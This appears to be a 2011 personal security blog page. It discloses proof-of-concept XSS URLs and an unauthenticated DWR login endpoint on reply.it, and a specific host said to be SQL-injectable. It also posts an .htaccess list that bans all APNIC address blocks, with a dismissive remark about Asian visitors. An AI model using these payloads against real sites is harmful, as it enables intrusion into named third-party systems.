Tuesday, 22 November 2011

XSS www.reply.it - sec. vulnerabilities


XSS
reply.it/it/search/?lang=IT&search=<script>alert(1);</script>
XSS
http://www.reply.it/en/tagSearch?tags=Financial+Reports%3Cscript%3Ealert%281%29;%3C/script%3E

mirror (?) - same
http://d3v578iyw1eidm.cloudfront.net/



several problems in the jsp scripts (unmanaged null exceptions, data of the template, data, etc)

template(?) is visible by requesting a wrong id (?)
http://reply.it/it/practices/cloudcomputing/readd,7700-


sample of the output (ex. http://reply.it/it/practices/cloudcomputing/readd,7700- )
---------------
<div class="yui-gc clear" id="unacolonna">
                              <div class="yui-u first" id="col_2_3_sx">
                                     <div class="tab">
                              ^service_link^
                                            
                              ^tag_contenuto^
         ^dettaglio_contenuto^
              
                                </div>
                               </div>
                        <div class="yui-gb">
                             ^box_jolly_cx_2^
                             ^box_jolly_cx_3^
                             ^box_jolly_cx_4^
--------------- 

It's possible to add data via POST and can be parsed as within the template.
(useless .. but could be used as a possible XSS attack)
 
--------------- 
bug in the getahead dwr library (ajax for java) ..... (old version?).
It's possible to login without logging.
(a simple request to this path)
http://www.reply.it/WPSReply2009/dwr/exec/RegistrationHandler.loginUser.dwr 

Block Spam from Asia china .htaccess solution

After receiving tons of spam on the website I've decided to ban the whole apnic...
previously I've tried to ban only china and korea but without success.
Since I've not found anything to ban the whole APNIC I've searched for the assigned classes that they manage.

P.S. I've added a few LACNIC

just add this in a .htaccess file and the spam from the Asia should be gone

#list retrieved from
#http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt

#Banning APNIC
deny from 1.0.0.0/8
deny from 27.0.0.0/8
deny from 36.0.0.0/8
deny from 39.0.0.0/8
deny from 42.0.0.0/8
deny from 43.0.0.0/8
deny from 49.0.0.0/8
deny from 58.0.0.0/8
deny from 59.0.0.0/8
deny from 60.0.0.0/8
deny from 61.0.0.0/8
deny from 101.0.0.0/8
deny from 103.0.0.0/8
deny from 106.0.0.0/8
deny from 110.0.0.0/8
deny from 111.0.0.0/8
deny from 112.0.0.0/8
deny from 113.0.0.0/8
deny from 114.0.0.0/8
deny from 115.0.0.0/8
deny from 116.0.0.0/8
deny from 117.0.0.0/8
deny from 118.0.0.0/8
deny from 119.0.0.0/8
deny from 120.0.0.0/8
deny from 121.0.0.0/8
deny from 122.0.0.0/8
deny from 123.0.0.0/8
deny from 124.0.0.0/8
deny from 125.0.0.0/8
deny from 126.0.0.0/8
deny from 133.0.0.0/8
deny from 150.0.0.0/8
deny from 153.0.0.0/8
deny from 163.0.0.0/8
deny from 171.0.0.0/8
deny from 175.0.0.0/8
deny from 180.0.0.0/8
deny from 182.0.0.0/8
deny from 183.0.0.0/8
deny from 202.0.0.0/8
deny from 203.0.0.0/8
deny from 210.0.0.0/8
deny from 211.0.0.0/8
deny from 218.0.0.0/8
deny from 219.0.0.0/8
deny from 220.0.0.0/8
deny from 221.0.0.0/8
deny from 222.0.0.0/8
deny from 223.0.0.0/8


Don't do it if you have contents that should be available to Asian people.
I'm not racists but the contents of my website is not intended for asian people and any asian person can understand that I'm just cutting down the spam.

another sql inj ... boring

http://host52-172-static.59-217-b.business.telecomitalia.it/fp/halunni.php?Cls=1N


sql injection (googled)